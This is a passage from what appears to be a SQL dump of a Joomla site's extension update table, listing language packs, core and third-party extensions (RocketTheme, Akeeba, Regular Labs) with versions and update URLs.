US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23781,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23782,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23783,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23784,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23785,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23786,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23787,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23788,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23789,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23790,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23791,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23792,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23793,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23794,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23795,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23796,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23797,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23798,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23799,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23800,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23801,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23802,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23803,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23804,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23805,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23806,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(23807,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(23808,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(23809,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(23810,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(23811,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(23812,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(23813,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(23814,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(23815,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23816,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23817,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23818,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23819,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23820,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23821,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23822,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23823,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23824,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23825,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23826,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23827,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23828,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23829,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23830,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23831,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23832,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23833,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23834,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23835,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23836,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23837,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23838,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23839,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23840,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23841,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23842,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23843,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23844,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23845,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23846,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23847,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23848,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23849,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23850,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23851,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23852,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23853,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23854,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23855,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23856,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23857,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23858,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23859,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23860,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23861,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23862,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23863,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23864,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23865,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(23866,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(23867,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(23868,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23869,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23870,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23871,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23872,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23873,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23874,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23875,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23876,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23877,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23878,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23879,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23880,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23881,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23882,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23883,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23884,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23885,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23886,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23887,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23888,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23889,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23890,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23891,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23892,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23893,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23894,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23895,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23896,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23897,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23898,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23899,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23900,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23901,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23902,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23903,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23904,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23905,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23906,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23907,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23908,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23909,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23910,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23911,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23912,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23913,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23914,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23915,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23916,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23917,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23918,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23919,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23920,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23921,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23922,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(23923,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(23924,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(23925,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(23926,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(23927,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(23928,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(23929,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(23930,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(23931,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23932,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23933,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23934,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23935,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23936,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23937,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23938,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23939,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23940,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23941,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23942,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23943,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23944,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23945,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23946,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23947,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23948,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23949,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23950,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23951,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23952,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23953,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23954,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23955,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23956,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23957,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23958,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23959,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23960,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23961,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23962,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23963,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23964,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23965,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23966,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23967,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23968,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23969,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23970,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23971,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23972,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23973,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23974,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23975,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23976,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23977,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23978,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23979,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23980,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23981,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(23982,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(23983,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(23984,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23985,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23986,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23987,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23988,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23989,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23990,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23991,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23992,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23993,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23994,3,0,'Arabic 